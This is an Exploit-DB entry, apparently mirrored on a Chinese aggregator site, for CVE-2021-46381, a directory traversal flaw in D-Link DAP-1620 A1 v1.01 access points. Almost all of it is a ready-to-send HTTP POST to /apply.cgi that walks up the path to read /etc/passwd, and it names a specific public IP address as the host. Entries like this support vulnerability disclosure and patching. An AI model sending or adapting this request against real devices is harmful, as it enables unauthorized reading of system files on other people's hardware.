DLINK DAP-1620 A1 v1.01 – Directory Traversal

• Exploit Database
• 16 阅读

• 作者： Momen Eldawakhly
  日期： 2022-05-11
• 类别：

  • remote
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/50919/

• # Exploit Title: DLINK DAP-1620 A1 v1.01 - Directory Traversal
  # Date: 27/4/2022
  # Exploit Author: Momen Eldawakhly (Cyber Guy)
  # Vendor Homepage: https://me.dlink.com/consumer
  # Version: DAP-1620 - A1 v1.01
  # Tested on: Linux
  # CVE : CVE-2021-46381
  
  POST /apply.cgi HTTP/1.1
  Content-Type: application/x-www-form-urlencoded
  Referer: http://84.217.16.220/
  Cookie: ID=634855649
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Encoding: gzip,deflate,br
  Content-Length: 281
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36
  Host: 84.217.16.220
  Connection: Keep-alive
  
  action=do_graph_auth&graph_code=94102&html_response_message=just_login&html_response_page=../../../../../../../../../../../../../../etc/passwd&log_pass=DummyPass&login_n=admin&login_name=DummyName&tkn=634855349&tmp_log_pass=DummyPass&tmp_log_pass_auth=DummyPass